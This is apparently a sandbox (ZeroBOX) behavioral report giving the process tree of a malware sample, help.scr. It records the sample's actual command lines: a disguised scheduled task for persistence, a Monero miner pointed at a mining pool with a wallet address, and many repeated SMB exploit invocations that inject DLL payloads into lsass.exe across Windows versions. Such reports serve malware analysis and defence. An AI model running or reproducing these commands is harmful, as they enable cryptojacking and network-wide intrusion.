popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • help.scr "C:\Users\test22\AppData\Local\Temp\help.scr"

    1532

    • cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

      2536

    • cmd.exe cmd /c taskkill /f /im spreadTpqrst.exe&&exit

      2624

    • spreadTpqrst.exe C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

      2928

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3428

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3464

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3512

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3616

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3724

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3832

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3952

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      1956

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3588

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      3808

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4088

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4208

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4436

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4584

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4908

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5096

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5148

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      5876

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      6232

    • cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

      4648

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf